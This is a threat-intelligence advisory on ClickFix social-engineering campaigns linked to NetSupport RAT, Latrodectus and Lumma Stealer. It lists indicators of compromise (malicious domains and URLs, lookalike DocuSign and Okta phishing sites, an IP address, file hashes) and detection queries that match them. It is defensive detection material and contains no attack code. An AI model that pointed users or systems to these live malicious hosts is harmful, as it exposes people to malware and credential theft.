Fix the Click: Preventing the ClickFix Attack Vector

    Friday, July 11, 2025 In: Threat Research Print

    Date: 07/11/2025

    Severity: High

    Summary

    This article provides hunting tips and mitigation strategies for ClickFix campaigns, along with insights into major 2025 incidents. Notable cases include NetSupport RAT with a new loader, Latrodectus malware using ClickFix lures, and widespread Lumma Stealer activity. ClickFix is a growing social engineering technique that tricks users into running malicious commands disguised as quick system fixes. These campaigns exploit the trust in legitimate tools, though the original software authors are not responsible for the misuse.

    Indicators of Compromise (IOC) List 

    Domains\URLs: 

    iplogger.co

    stuffgull.top

    sumeriavgv.digital

    pub-164d8d82c41c4e1b871bc21802a18154.r2.dev

    pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev

    pub-164d8d82c41c4e1b871bc21802a18154.r2.dev

    pub-a5a2932dc7f143499b865f8580102688.r2.dev

    pub-7efc089d5da740a994d1472af48fc689.r2.dev

    agroeconb.live

    animatcxju.live

    https://webbs.live/on/

    https://diab.live/up/

    https://mhbr.live/do/

    https://decr.live/j/

    https://lexip.live/n/

    https://rimz.live/u/

    https://byjs.live/v/

    https://btco.live/r/

    https://izan.live/r/

    https://k.veuwb.live/234

    https://r.netluc.live

    heyues.live

    https://k.mailam.live/234234

    oktacheck.it.com

    doccsign.it.com

    docusign.sa.com

    dosign.it.com

    loyalcompany.net

    leocompany.org

    80.77.23.48

    mhousecreative.com

    mh-sns.com

    lasix20.com

    IP Address : 

    80.77.23.48

    Hash : 

    2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef

    06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

    5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1

    52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293

    57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a

    33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

    5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D

    9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288

    CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527

    506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a

    3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains\URLs :

    domainname like "https://k.veuwb.live/234" or url like "https://k.veuwb.live/234" or siteurl like "https://k.veuwb.live/234" or domainname like "https://r.netluc.live" or url like "https://r.netluc.live" or siteurl like "https://r.netluc.live" or domainname like "https://decr.live/j/" or url like "https://decr.live/j/" or siteurl like "https://decr.live/j/" or domainname like "https://lexip.live/n/" or url like "https://lexip.live/n/" or siteurl like "https://lexip.live/n/" or domainname like "docusign.sa.com" or url like "docusign.sa.com" or siteurl like "docusign.sa.com" or domainname like "agroeconb.live" or url like "agroeconb.live" or siteurl like "agroeconb.live" or domainname like "doccsign.it.com" or url like "doccsign.it.com" or siteurl like "doccsign.it.com" or domainname like "iplogger.co" or url like "iplogger.co" or siteurl like "iplogger.co" or domainname like "mh-sns.com" or url like "mh-sns.com" or siteurl like "mh-sns.com" or domainname like "https://izan.live/r/" or url like "https://izan.live/r/" or siteurl like "https://izan.live/r/" or domainname like "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev" or url like "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev" or siteurl like "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev" or domainname like "stuffgull.top" or url like "stuffgull.top" or siteurl like "stuffgull.top" or domainname like "pub-7efc089d5da740a994d1472af48fc689.r2.dev" or url like "pub-7efc089d5da740a994d1472af48fc689.r2.dev" or siteurl like "pub-7efc089d5da740a994d1472af48fc689.r2.dev" or domainname like "leocompany.org" or url like "leocompany.org" or siteurl like "leocompany.org" or domainname like "https://diab.live/up/" or url like "https://diab.live/up/" or siteurl like "https://diab.live/up/" or domainname like "oktacheck.it.com" or url like "oktacheck.it.com" or siteurl like "oktacheck.it.com" or domainname like "mhousecreative.com" or url like "mhousecreative.com" or siteurl like "mhousecreative.com" or domainname like "sumeriavgv.digital" or url like "sumeriavgv.digital" or siteurl like "sumeriavgv.digital" or domainname like "pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev" or url like "pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev" or siteurl like "pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev" or domainname like "pub-a5a2932dc7f143499b865f8580102688.r2.dev" or url like "pub-a5a2932dc7f143499b865f8580102688.r2.dev" or siteurl like "pub-a5a2932dc7f143499b865f8580102688.r2.dev" or domainname like "animatcxju.live" or url like "animatcxju.live" or siteurl like "animatcxju.live" or domainname like "https://webbs.live/on/" or url like "https://webbs.live/on/" or siteurl like "https://webbs.live/on/" or domainname like "https://mhbr.live/do/" or url like "https://mhbr.live/do/" or siteurl like "https://mhbr.live/do/" or domainname like "https://rimz.live/u/" or url like "https://rimz.live/u/" or siteurl like "https://rimz.live/u/" or domainname like "https://byjs.live/v/" or url like "https://byjs.live/v/" or siteurl like "https://byjs.live/v/" or domainname like "https://btco.live/r/" or url like "https://btco.live/r/" or siteurl like "https://btco.live/r/" or domainname like "heyues.live" or url like "heyues.live" or siteurl like "heyues.live" or domainname like "https://k.mailam.live/234234" or url like "https://k.mailam.live/234234" or siteurl like "https://k.mailam.live/234234" or domainname like "dosign.it.com" or url like "dosign.it.com" or siteurl like "dosign.it.com" or domainname like "loyalcompany.net" or url like "loyalcompany.net" or siteurl like "loyalcompany.net" or domainname like "lasix20.com" or url like "lasix20.com" or siteurl like "lasix20.com"

    IP Address :

    dstipaddress IN ("80.77.23.48") or srcipaddress In ("80.77.23.48")

    Hash : 

    sha256hash IN ("33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559","06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7","2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef","CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527","52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293","5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1","57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a","5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D","9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288","506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a","3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7")

    Reference:

    https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/


    Tags

    MalwareLatrodectusLumma StealerRATNetSupport RATClickFix

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.